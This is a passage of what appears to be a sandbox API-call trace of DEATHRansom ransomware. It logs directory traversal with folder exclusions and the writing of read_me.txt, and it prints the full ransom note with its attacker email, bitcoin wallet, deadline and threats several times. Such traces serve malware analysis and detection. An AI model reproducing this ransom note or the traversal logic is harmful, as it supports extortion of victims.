pszDest=0x8b70118, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\read_me.txt") returned 33 [0073.827] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\read_me.txt" (normalized: "c:\\perflogs\\admin\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0073.827] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.827] WriteFile (in: hFile=0x7b8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.828] CloseHandle (hObject=0x7b8) returned 1 [0073.828] GetProcessHeap () returned 0x280000 [0073.829] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b70118 | out: hHeap=0x280000) returned 1 [0073.829] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="admin", cAlternateFileName="")) returned 0 [0073.829] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.829] wnsprintfW (in: pszDest=0x8a50088, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\PerfLogs\\read_me.txt") returned 27 [0073.829] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\read_me.txt" (normalized: "c:\\perflogs\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0073.829] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.829] WriteFile (in: hFile=0x780, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e5d4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e5d4*=0x6b3, lpOverlapped=0x0) returned 1 [0073.830] CloseHandle (hObject=0x780) returned 1 [0073.830] GetProcessHeap () returned 0x280000 [0073.830] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a50088 | out: hHeap=0x280000) returned 1 [0073.830] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x17e5e8 | out: lpFindFileData=0x17e5e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf8fd7c90, ftLastAccessTime.dwHighDateTime=0x1d59ffd, ftLastWriteTime.dwLowDateTime=0xf8fd7c90, ftLastWriteTime.dwHighDateTime=0x1d59ffd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e630, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0073.830] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files") returned 20 [0073.830] lstrcmpW (lpString1="Program Files", lpString2="..") returned 1 [0073.830] lstrcmpW (lpString1="Program Files", lpString2=".") returned 1 [0073.830] StrStrW (lpFirst="program files", lpSrch="programdata") returned 0x0 [0073.830] StrStrW (lpFirst="program files", lpSrch="$recycle.bin") returned 0x0 [0073.830] StrStrW (lpFirst="program files", lpSrch="program files") returned="program files" [0073.830] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x17e5e8 | out: lpFindFileData=0x17e5e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e630, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0073.830] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)") returned 26 [0073.830] lstrcmpW (lpString1="Program Files (x86)", lpString2="..") returned 1 [0073.830] lstrcmpW (lpString1="Program Files (x86)", lpString2=".") returned 1 [0073.831] StrStrW (lpFirst="program files (x86)", lpSrch="programdata") returned 0x0 [0073.831] StrStrW (lpFirst="program files (x86)", lpSrch="$recycle.bin") returned 0x0 [0073.831] StrStrW (lpFirst="program files (x86)", lpSrch="program files") returned="program files (x86)" [0073.831] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x17e5e8 | out: lpFindFileData=0x17e5e8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e630, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0073.831] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData") returned 18 [0073.831] lstrcmpW (lpString1="ProgramData", lpString2="..") returned 1 [0073.831] lstrcmpW (lpString1="ProgramData", lpString2=".") returned 1 [0073.831] StrStrW (lpFirst="programdata", lpSrch="programdata") returned="programdata" [0073.831] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x17e5e8 | out: lpFindFileData=0x17e5e8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e630, cFileName="Recovery", cAlternateFileName="")) returned 1 [0073.831] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery") returned 15 [0073.831] lstrcmpW (lpString1="Recovery", lpString2="..") returned 1 [0073.831] lstrcmpW (lpString1="Recovery", lpString2=".") returned 1 [0073.831] StrStrW (lpFirst="recovery", lpSrch="programdata") returned 0x0 [0073.831] StrStrW (lpFirst="recovery", lpSrch="$recycle.bin") returned 0x0 [0073.831] StrStrW (lpFirst="recovery", lpSrch="program files") returned 0x0 [0073.831] StrStrW (lpFirst="recovery", lpSrch="windows") returned 0x0 [0073.831] StrStrW (lpFirst="recovery", lpSrch="all users") returned 0x0 [0073.831] StrStrW (lpFirst="recovery", lpSrch="appdata") returned 0x0 [0073.831] GetProcessHeap () returned 0x280000 [0073.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a50088 [0073.831] lstrcpyW (in: lpString1=0x8a50088, lpString2="\\\\?\\C:\\Recovery" | out: lpString1="\\\\?\\C:\\Recovery") returned="\\\\?\\C:\\Recovery" [0073.831] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 31 [0073.831] QueueUserWorkItem (Function=0x40a710, Context=0x8a50088, Flags=0x0) returned 1 [0073.831] GetProcessHeap () returned 0x280000 [0073.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b70118 [0073.832] wnsprintfW (in: pszDest=0x8b70118, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Recovery\\*") returned 17 [0073.832] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\*", lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0073.839] wnsprintfW (in: pszDest=0x8b70118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\.") returned 17 [0073.839] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.839] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.839] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0073.839] wnsprintfW (in: pszDest=0x8b70118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\..") returned 18 [0073.839] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.839] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0073.839] wnsprintfW (in: pszDest=0x8b70118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 52 [0073.839] lstrcmpW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="..") returned 1 [0073.839] lstrcmpW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2=".") returned 1 [0073.839] StrStrW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="programdata") returned 0x0 [0073.839] StrStrW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="$recycle.bin") returned 0x0 [0073.839] StrStrW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="program files") returned 0x0 [0073.839] StrStrW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="windows") returned 0x0 [0073.840] StrStrW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="all users") returned 0x0 [0073.840] StrStrW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="appdata") returned 0x0 [0073.840] GetProcessHeap () returned 0x280000 [0073.840] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a900a8 [0073.840] lstrcpyW (in: lpString1=0x8a900a8, lpString2="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0073.840] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 32 [0073.840] QueueUserWorkItem (Function=0x40a710, Context=0x8a900a8, Flags=0x0) returned 1 [0073.840] GetProcessHeap () returned 0x280000 [0073.840] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b80120 [0073.840] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*") returned 54 [0073.840] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.840] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\.") returned 54 [0073.840] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.840] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.840] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.840] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\..") returned 55 [0073.840] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.840] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0073.840] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 61 [0073.840] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0073.840] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 62 [0073.840] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0073.840] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.841] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\read_me.txt") returned 64 [0073.841] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\read_me.txt" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b0 [0073.841] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.841] WriteFile (in: hFile=0x7b0, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.842] CloseHandle (hObject=0x7b0) returned 1 [0073.842] GetProcessHeap () returned 0x280000 [0073.842] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b80120 | out: hHeap=0x280000) returned 1 [0073.842] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 0 [0073.843] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0073.843] wnsprintfW (in: pszDest=0x8b70118, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Recovery\\read_me.txt") returned 27 [0073.843] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\read_me.txt" (normalized: "c:\\recovery\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0073.843] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find 